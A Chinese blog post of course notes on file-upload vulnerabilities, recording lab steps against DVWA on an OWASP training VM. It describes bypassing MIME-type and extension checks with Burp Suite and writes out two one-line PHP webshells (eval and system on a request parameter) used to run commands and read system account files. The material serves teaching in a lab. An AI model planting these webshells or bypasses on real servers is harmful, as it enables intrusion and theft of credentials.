当前位置:   article > 正文

《Web安全渗透全套教程(40集)》学习笔记 | 文件上传漏洞原理及实验_千峰云计算杨哥web安全渗透全40ji课程笔记

千峰云计算杨哥web安全渗透全40ji课程笔记

学习视频来源:B站《Web安全渗透全套教程(40集)》

个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。

实验环境

目标靶机:OWASP_Broken_Web_Apps_VM_1.2,用户名/密码:root/owaspwba

测试渗透机:Kali-Linux-2018.2-vm-amd64,用户名/密码:root/toor

(2个虚拟机可通过baidu搜索下载,有需要的小伙伴可私信我)

渗透机开启ssh服务(默认无法通过SecureCRT登录)

  1. service ssh
  2. systemctl enable ssh
  3. systemctl status ssh

验证服务正常启动

实验原理

实验过程

实验一:低安全模式下,上传任意类型的文件,文件大小限制

(1):通过浏览器访问172.16.190.198(小伙伴们的虚机通过NAT获取的IP地址应该是其他地址)

(2):点击登录Damn Vulnerable Web Application时用户名/密码:admin/admin

(3):此处查看到当前安全级别为Low

(4):选择任意类型文件上传(非图像文件)

(5):上传成功

(6):查看Low级别下php源码

实验二:中安全模式下,绕过类型上传文件【文件mime类型】

(1):调整安全级别为medium

(2):查看Medium级别下php源码,其对mime类型进行了校验

(3):无法上传非图像文件

(4):下载并使用该软件

(5):BurpSuite代理工作原理

(6):Kali虚拟机设置代理服务器

(7):点击Kali虚机中的BurpSuite,创建空项目

(8):使用默认参数,点击Start Burp

(9):默认代理功能开启

(10):如果希望外部主机的浏览器也需使用代理,则需要开启所有接口的监听

(11):浏览器上传文件时,并不会直接成功,点击Forward才会成功

(12):上传php文件,但修改Content-type为image/jpeg

(13):修改完毕后再点击Forward即可上传

(14):绕过medium中级安全防护,上传成功

实验三:高安全模式 - 上传一句话图片木马【文件后缀限制】

(1):修改级别为High

(2):查看源码为限制了文件的后缀名

(3):上传php文件无法上传

(4):可用代理拦截,修改文件后缀名,点击Forward

(5):文件就可以成功上传

Webshell

小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数

大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到

(1):编写shell2.php,并成功上传,其中内容为<?php eval($_REQUEST['guol']);?>

(2):在浏览器输入文件路径及参数,可以查看php信息

(3):编写shell3.php,并成功上传,其中内容为<?php system($_REQUEST['guol']);?>

(4):在浏览器输入文件路径及参数,可以查看linux系统用户名和密码

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/469484
推荐阅读
相关标签
  

闽ICP备14008679号